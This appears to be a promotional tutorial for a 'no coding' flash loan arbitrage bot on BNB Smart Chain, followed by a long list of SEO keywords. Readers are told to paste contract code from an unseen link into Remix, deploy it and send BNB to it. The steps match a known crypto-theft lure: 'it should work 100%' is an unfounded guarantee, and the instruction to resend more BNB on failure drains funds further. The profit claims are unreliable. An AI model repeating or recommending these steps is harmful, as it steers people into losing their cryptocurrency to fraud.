Flash loan crypto arbitrage bots have been making a lot of money! The problem is very few people know how to code one of these bots. Today we bring you a zero coding needed flash loan arbitrage bot!
Flash loans are a type of uncollateralized lending that have become very popular in decentralized finance (DeFi). While they’ve proved popular, flash loan exploits have been used to attack vulnerable DeFi protocols and steal millions of dollars.
So, what’s the catch?
A flash loan has to be borrowed and repaid within the same blockchain transaction.
Step By Step Tutorial for Flash Loan:
1. Get the Metamask Extension for your browser
2. Open http://remix.ethereum.org/ from within your browser.
3. Click on File Explorers and click “Create New File “.
4. Name the file flashloans.sol and paste the contract code link below.
5. Click on Deploy & Run transactions and set “ENVIRONMENT” to Injected Web3.
6. Connect your MetaMask wallet.
7. Click on the “Solidity Compiler” and set the compiler version to 0.5.0
8. Click on the Solidity Compiler and then click the blue button “Compile flashloans.sol”
9. Wait for the code to compile.
10. Click on Deploy & run transactions then click on the down arrow right from the “Deploy” button
11. On “_TOKENNAME” mytoken
12. On “_TOKENSYMBOL” LOP
13. On “_LOANAMOUNT” 1000
14. Click Transact and confirm the transaction in MetaMask.
15. Wait for the transaction to confirm.
16. Copy the address of the newly deployed contract.
17. Send BNB to the deployed contract to initiate the swap 0.2+ (0.3 up is better as you will get a bigger amount in each swap)
18. Wait for the transaction to confirm.
19. Now, Click “action” (red box) to execute the Flash Loan.
20. Confirm the transaction in MetaMask and wait for the confirmation.
21. You can now check your wallet
Note: if it doesn’t work with 0.2 BNB try to send another 0.2 BNB (0.30 is better), because fees may be different from day to day. (1.5+ BNB for each 1000 BNB you are borrowing)
Avoid using very low amounts as contract may fail below 0.15 BNB.
Under some very rare cases, the arbitrage might fail due to depletion of BNB in your smart contract as gas price varies from time to time. Don’t panic, all you have to do is wait a little while(5 -10 mins) and retry the transaction this time preferably with 825 loan amount and 31,560 gas limit and it should work 100% but with a smaller profit.
Make sure to transfer your BNB out to another wallet when you’re done.
flash loan arbitrage, flash loan arbitrage bot, flash loan arbitrage tutorial, flash loan arbitrage code, flash loan arbitrage no code, flash loan arbitrage bsc, flash loan arbitrage tutorial bnb, flash loan arbitrage bot tutorial, flash loan arbitrage live, flash loan arbitrage solidity, flash loan arbitrage furucombo, flash loan arbitrage example, flash loan arbitrage bot github, flash loan arbitrage eth, flash loan bot, flash loan bot github, flash loan arbitrage bot tutorial, flash loan arbitrage bot github, aave flash loan arbitrage bot, flash loans, flash loans crypto, flash loans arbitrage, flash loans aave, flash loans on binance smart chain, flash loans bnb, flash loans dapp university, flash loans pancakeswap, flash loans no coding, flash loans tutorial, flash loans 2021, flash loans ethereum, flash loans bsc, flash loan attacks , bsc flash loan, bsc flash loan arbitrage, bsc flash loan attack, bsc flash loan tagalog, bsc flash loan arbitrage github, bsc flash loan tutorial, bsc flash loan code, bsc flash loan bot,flash loans aave
#Flashloan #Crypto #Binance / BNB #Youtube